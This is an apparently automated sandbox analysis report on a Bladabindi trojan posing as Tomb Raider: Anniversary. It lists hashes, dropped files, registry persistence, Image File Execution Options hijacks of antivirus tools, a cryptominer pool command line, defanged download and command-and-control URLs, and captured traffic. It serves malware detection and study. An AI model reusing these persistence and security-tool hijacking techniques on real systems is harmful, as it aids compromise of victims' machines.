Trojan.MSIL.Bladabindi.2_cd8552c36a
Trojan.MSIL.Citron.ks (Kaspersky), Trojan.GenericKD.1607040 (B) (Emsisoft), Trojan.GenericKD.1607040 (AdAware), Trojan.MSIL.Bladabindi.2.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: cd8552c36a49c885054202b0ec31b79a
SHA1: 72600be5c1ad5d2e1aa6a4ccaf0ff336b454d562
SHA256: c489131bea17df0bb57ff25187313adee776b8fe9655205f53ded82700a12420
SSDeep: 6144:wpMvLP3P8CzGNErLTIdVAysdEM8WLDH2 fGMMcHrxmVWI0y12lh8hIpSchJ7dX:Qa/kCzaEfoAP0cHlfGMMcHi70y12lhOC
Size: 385024 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-03-12 16:02:00
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
WScript.exe:2280
WScript.exe:3524
wuauclt.exe:304
cvtres.exe:2696
cvtres.exe:3396
vbc.exe:1128
vbc.exe:2912
vbc.exe:2688
vbc.exe:3780
vbc.exe:672
The Trojan injects its code into the following process(es):
cvtres.exe:3500
nt32.exe:1324
%original file name%.exe:1180
63462.exe:2876
File activity
The process wuauclt.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
The Trojan deletes the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)
The process nt32.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
C:\NTKernel\load32 (7972 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (54 bytes)
%Documents and Settings%\%current user%\My Documents\315load32.exe (2105 bytes)
%Documents and Settings%\All Users\Application Data\load32.exe (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
C:\NTKernel\63462.exe (32324 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (126 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)
The process %original file name%.exe:1180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\load32.vbs (901 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
C:\NTKernel\nt32.exe (2105 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)
Registry activity
The process WScript.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 14 2C B3 A3 65 26 38 5D 96 96 55 38 67 53 E1"
The process WScript.exe:3524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 1D 6F F9 83 AC 69 97 A6 1C 3E A6 6D 90 C0 9F"
The process cvtres.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C A3 2D 47 C1 E2 08 0E FC 2D 80 E2 A5 3A 7A 68"
The process cvtres.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 5A D0 36 4C BB 93 51 22 AB 3A 65 67 42 E4 A8"
The process nt32.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"63462.exe" = "Tomb Raider: Anniversary"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt32.exe]
"DisableExceptionChainValidation" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 E6 AC A4 EE E6 B0 25 8B D7 E9 23 36 50 A7 73"
[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://ltc.give-me-coins.com:3333 -O cbbamd.CPU:1234 -t THREADS"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\NTKernel\nt32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service"
"VMware User Process"
"VMware Tools"
"Adobe ARM"
"SunJavaUpdateSched"
"Adobe Reader Speed Launcher"
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Microsoft"
The process vbc.exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 E9 8C 2D 08 26 25 91 07 6C A3 FC DB 92 73 2D"
The process vbc.exe:2912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 5E 81 E2 3D E2 41 6E FF C5 45 84 4D D0 18 17"
The process vbc.exe:2688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 1F 91 3E 35 F5 77 A1 B8 AD 93 DC 0F 62 D3 E0"
The process vbc.exe:3780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 97 A3 BC CF 7F 1D 71 8F 2F EB 51 47 90 7B 36"
The process vbc.exe:672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 88 86 FB A4 8F 14 18 46 E6 B8 8C 49 C6 3E AF"
The process %original file name%.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"
[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"nt32.exe" = "Tomb Raider: Anniversary"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A FD 36 BB E0 02 ED BB E3 30 CF 4B FB CA F4 2E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://ltc.give-me-coins.com:3333 -O cbbamd.CPU:1234 -t THREADS"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "c:\%original file name%.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service"
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Microsoft"
The process 63462.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 7B 99 8F 38 65 F9 35 65 2D C5 64 2B 0F E3 1F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
Dropped PE files
MD5 | File path |
---|---|
67f5238229333c061092f5a32e8c2ee1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\svchost.exe |
e4f7c0be34da7869241a69d2ff932843 | c:\NTKernel\63462.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Eidos Inc.
Product Name: Tomb Raider: Anniversary
Product Version: 1.0.9
Legal Copyright: Copyright (C) 2007 Eidos Inc.
Legal Trademarks: Crystal Dynamics(R), the Crystal Dynamics(R) logo and the Eidos(R) logo are registered trademarks of the Eidos Group of Companies
Original Filename: FlvPlayer.exe
Internal Name: FlvPlayer.exe
File Version: 1.0.9
File Description: Tomb Raider: Anniversary
Comments: Tomb Raider: Anniversary
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 261812 | 262144 | 5.20951 | 73fb6f02c868f34b09ac3c9e87b325a8 |
.rsrc | 270336 | 118784 | 118784 | 4.34853 | 616065ae9776e72156a40aa493baa087 |
.reloc | 393216 | 12 | 512 | 0.070639 | f2d0169b522fda54bd2715b38c473014 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://popdown.me/wordpress/1/gate.php | ![]() |
hxxp://ge.tt/api/1/files/9a2RqWN1/0/blob?download | ![]() |
hxxp://open.ge.tt/1/files/9a2RqWN1/0/blob?download | ![]() |
hxxp://s3-3-w.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 | ![]() |
hxxp://ge.tt/api/1/files/6bcJvOg1/0/blob?download | ![]() |
hxxp://open.ge.tt/1/files/6bcJvOg1/0/blob?download | ![]() |
hxxp://ec2-54-217-102-175.eu-west-1.compute.amazonaws.com/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download | ![]() |
hxxp://e6845.ce.akamaiedge.net/pca3-g2.crl | ![]() |
hxxp://e6845.ce.akamaiedge.net/CSC3-2009.crl | ![]() |
hxxp://e6845.ce.akamaiedge.net/CSC3-2009-2.crl | ![]() |
hxxp://e6845.ce.akamaiedge.net/pca3-g5.crl | ![]() |
hxxp://e6845.ce.akamaiedge.net/CSC3-2010.crl | ![]() |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | ![]() |
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 | ![]() |
hxxp://crl.verisign.com/pca3-g5.crl | ![]() |
hxxp://csc3-2009-crl.verisign.com/CSC3-2009.crl | ![]() |
hxxp://w269456.open.ge.tt/1/files/6bcJvOg1/0/blob?download | ![]() |
hxxp://w013064.blob2.ge.tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download | ![]() |
hxxp://crl.verisign.com/pca3-g2.crl | ![]() |
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl | ![]() |
hxxp://w524017.open.ge.tt/1/files/9a2RqWN1/0/blob?download | ![]() |
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl | ![]() |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | ![]() |
ltc.give-me-coins.com | ![]() |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN W32.Blackshades/Shadesrat Backdoor CnC Beacon
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response
Traffic
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=11504
Date: Sun, 11 May 2014 03:57:55 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 21401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modi
fied: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f
4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Conte
nt-Length: 18..Cache-Control: max-age=11504..Date: Sun, 11 May 2014 03
:57:55 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..1401CF3DB40B6
09892..
GET /api/1/files/9a2RqWN1/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://w524017.open.ge.tt/1/files/9a2RqWN1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w524017.open.ge.t
t/1/files/9a2RqWN1/0/blob?download..Connection: keep-alive..Transfer-E
ncoding: chunked..0......
GET /api/1/files/6bcJvOg1/0/blob?download HTTP/1.1
Host: ge.tt
HTTP/1.1 307 Temporary Redirect
location: hXXp://w269456.open.ge.tt/1/files/6bcJvOg1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w269456.open.ge.t
t/1/files/6bcJvOg1/0/blob?download..Connection: keep-alive..Transfer-E
ncoding: chunked..0..
GET /1/files/9a2RqWN1/0/blob?download HTTP/1.1
Host: w524017.open.ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798
connection: keep-alive
transfer-encoding: chunked0..HTTP/1.1 307 Temporary Redirect..location: hXXp://s3.kkloud.com.s3.
amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-dispositio
n=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/
IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798..connection: keep-alive..t
ransfer-encoding: chunked..0..
GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "ca32618c4340c20d208aad10883a84d6:1399755910"
Last-Modified: Sat, 10 May 2014 21:05:10 GMT
Accept-Ranges: bytes
Content-Length: 37283
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0
